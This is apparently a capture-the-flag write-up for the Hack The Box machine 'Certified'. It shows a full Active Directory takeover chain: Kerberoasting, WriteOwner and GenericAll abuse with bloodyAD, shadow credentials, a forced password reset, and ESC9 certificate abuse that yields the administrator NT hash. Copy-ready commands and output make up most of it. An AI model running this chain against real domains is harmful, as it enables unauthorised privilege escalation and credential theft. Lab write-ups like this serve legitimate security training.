Writeup for hackthebox machine certified>
Os: windows
Difficulty: medium (easy for me. haha)
ip: 10.10.11.41
Initial Creds: judith.mader / judith09
Port Scan

1
2
3
4
5
6
7
8
9
10
11
12
|
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPss
|
hostname: dc01.certified.htb
User Enumeration


Kerberoasting
We can try kerberoaating to obtain hashes that we can crack using hashcat. Unfortunately this hash for user management_svc is not cracklable.
1
2
3
4
5
|
impacket-GetUserSPNs -dc-ip 10.10.11.42 certified.htb/judith.mader:judith09
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$0942cc8d798a07f94d23f3d40f31c101$776c8d324e7e666f23dda53b33fec0cade021b6ee151eaa16879a340e22c48243d2802418c63da7fb897e2dac062e6ccc07a01f7162e67dbede725aba2351d3d4f0b691b8b1cba209c19e1ac523c749b023a9c846e60ea7fcfe2e598a8d598bddf3bdcdeaa70b9c3205ce472dccc57cf7dfa3f7a2cf83f607021f411a57ca5ec59152863314f2891cf438f34765df4ceec7660ba437714775981d7997cbf1f9d941e3afd0bfbe4be12227fd4b269a46c327a976d03806cd7dea9e9d538b9a99bd2400f829fd070e22945c1a1e3e3f822026d7506044ab68feea8e76077f95c30a273a13d15afa89c81e8659a20e4563f4ce215f44bfb745251401a55a443506e2f97c324baaa8580d03cdd7212bc764dfe4985d450533c08676620ebbbb3fce9bde8975142d1c58ac10bd87c38dd9b730fdfe28ffd63fd978f5e87f019c966b46c713c01754df8a51ef34ef47b178f78f52d64dca524cec57fbb2b77da9dd356c1307341b78d9f91d91a988fefcef49f7ded58e5fd77e23bf90d5957da0696c8b6ccb53e8dda629fe297e3447754b544ed2dea02d6f11ff8510deff0f9820ba033ae0f42deb640dd4a6f0cafd220a40001017d51eb74a8403dd53650d23e89798c05b0d1b918be1cfb5896f29890986af5d3e49d1ded510e3eb50b30fb6c7279374c2a0215a68b582a2cf45fd29025450c7a314f58907499ee5ac3eae981e3afd3bcf702602001f959a5fa1fc9109af00a33ba165cdfec907a5aa50b46e08e81c9f8bedc1783b3a20a02700e10b3056a09454738348e3a858b6aacca78e5a499499651e74682043d6bffc916074ff8133b052ffe9bd7fba76f10168ba85e4b05a3cf889634252d592bd524816a7ccc9ca8b0a78ecfb7f102af2b5915ccbab1555da29e1541e31989b156b6884ad5388f40523c5cca3be7e9ee8a9777acffeac23ca7a8edd1e095491a20c20b907220c96abe27ac5b67f478ced480650c06addeb87a94094727aae1692333f0171c8c8ae6b01cf549b437028a19742243004ecd104d18144243d71c5f1505d535db25a29f6e3205cc1fdec6d78adfe20ee8c2de20ed0d46fe0d2c470e06c77b9f7b2b7d8f863f8f2bfc68aae61d4dcb3eeceb3c2dd7c5c700eecf1015df7677678605aecdefe4657f7f5fd6df0f165e6ac573d8407b63e76e8c90c8168c0ecc9327a4c6cee0b901c9e7857595d6936d1aba6cfb55e947f61bed67d5c2a98eeb0ffc058c60d1d097065508e490653f22fddddd9d56b2434a7a74dd8b0a0be580a64b771a29f37da20f964d03beb53e1de660d4910d560dc1cf9d267e4877b0a91a7afeb0b594629c973c08f4022e62aafd06cf72db68f411f19c029193e6cc302b96ce47264156969e819fb9c3c33749d7fc92f4f2d92a7ae1f0f194594e6e6fe13b28cd424dca74d31684b4bd7b13162fc878e4bb4e9a8df13240124bad0341c7030bc647b8534cf98046f5607f9ecc4336c7533fa9759f09b86653ee75c9d1e439c931899f0eee4b6d4f5aede0df9bdc6528ac9c172b72a49672d503b2117e1c7e7f1e1a141f618a1644e179a
|
Bloodhound
From bloodhound we can see that there is not direct route from our current user judith.mader to administrator.

But user judith.mader has WriteOwner privilledges on the OU Management. This enables user judith to change the owner of the OU. This can be done by using tthe impacket-owneredit.
1
|
python3 owneredit.py 'certified.htb'/'judith.mader':'judith09' -action write -new-owner 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB'
|
From here we give user judith genericAll privs on the group. So she has full control of the group.
1
|
bloodyAD --host "10.10.11.41" -d "certified.htb" -u "judith.mader" -p "judith09" add genericAll Management judith.mader
|
We can then add user judith to Management OU
1
2
|
bloodyAD --host "10.10.11.41" -d "certified.htb" -u "judith.mader" -p "judith09" add groupMember "Management" "judith.mader"
|
Since the group management has genericAll on user management_svc . We can:
- perform targeted Kerberoasting » this will lead to the hash as we got in the initial kerberoast , so we cant crack it.
- use shadow credentials

Check the following reference ref
For shadow creds we can choose to use:
1
|
python3 pywhisker.py -d certified.htb -u judith.mader -p judith09 --target management_svc --action add
|
1
|
certipy-ad shadow auto -u "judith.mader"@"certified.htb" -p "judith09" -account "management_svc"
|
From this we can obtain the ntlm hash for user management_svc. We can now login via winrm.
1
|
a091c1832bcdd4677c28b5a6a1295584
|
user.txt :)
ADCS
From bloodhound you can see that user management_svc has genericWrite on user ca_operator. So we can chage the password. You can also use the shadow creds technique to get the nthash instead.
1
|
bloodyAD --host "10.10.11.41" -d "certified.htb" -u "management_svc" -p "a091c1832bcdd4677c28b5a6a1295584:a091c1832bcdd4677c28b5a6a1295584" set password "ca_operator" 'p@ssw0rd!'
|
As per the name of this machine , you should obviously guess that we need to exploit ADCS.
Use the following command to find vulnerable certs.
1
|
certipy-ad find -u ca_operator@certified.htb -p 'p@ssw0rd!' -dc-ip 10.10.11.41 -stdout -vulnerable
|
We can see that we have ESC9 certificate that is misconfigured. You can read more on this topic » here
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
|
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'certified-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : certified-DC01-CA
DNS Name : DC01.certified.htb
Certificate Subject : CN=certified-DC01-CA, DC=certified, DC=htb
Certificate Serial Number : 36472F2C180FBB9B4983AD4D60CD5A9D
Certificate Validity Start : 2024-05-13 15:33:41+00:00
Certificate Validity End : 2124-05-13 15:43:41+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : CERTIFIED.HTB\Administrators
Access Rights
ManageCertificates : CERTIFIED.HTB\Administrators
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
ManageCa : CERTIFIED.HTB\Administrators
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Enroll : CERTIFIED.HTB\Authenticated Users
Certificate Templates
0
Template Name : CertifiedAuthentication
Display Name : Certified Authentication
Certificate Authorities : certified-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireDirectoryPath
SubjectAltRequireUpn
Enrollment Flag : NoSecurityExtension
AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Server Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFIED.HTB\operator ca
CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
Object Control Permissions
Owner : CERTIFIED.HTB\Administrator
Write Owner Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
CERTIFIED.HTB\Administrator
Write Dacl Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
CERTIFIED.HTB\Administrator
Write Property Principals : CERTIFIED.HTB\Domain Admins
CERTIFIED.HTB\Enterprise Admins
CERTIFIED.HTB\Administrator
[!] Vulnerabilities
ESC9 : 'CERTIFIED.HTB\\operator ca' can enroll and template has no security extension
|
To exploit this. We need to change the upn of user ca_operator to administrator. Since we have genericWrite this is possible.
1
2
|
certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584:a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator
|
Then as user ca_operator we request the certificate. Yiou can see the template name from the output above.
1
2
3
4
5
6
7
8
9
10
|
certipy-ad req -username ca_operator@certified.htb -password 'p@ssw0rd!' -ca certified-DC01-CA -template CertifiedAuthentication
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
|
We get an admninistrator.pfx, we need to change the upn back to ca_operator.
1
|
certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584:a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator
|
We can now use the cert to authenticaate and get administrator nthash.
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.41 -domain certified.htb
1
2
3
4
5
6
|
[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
|
root.txt :)
We have pwned CERTIFIED.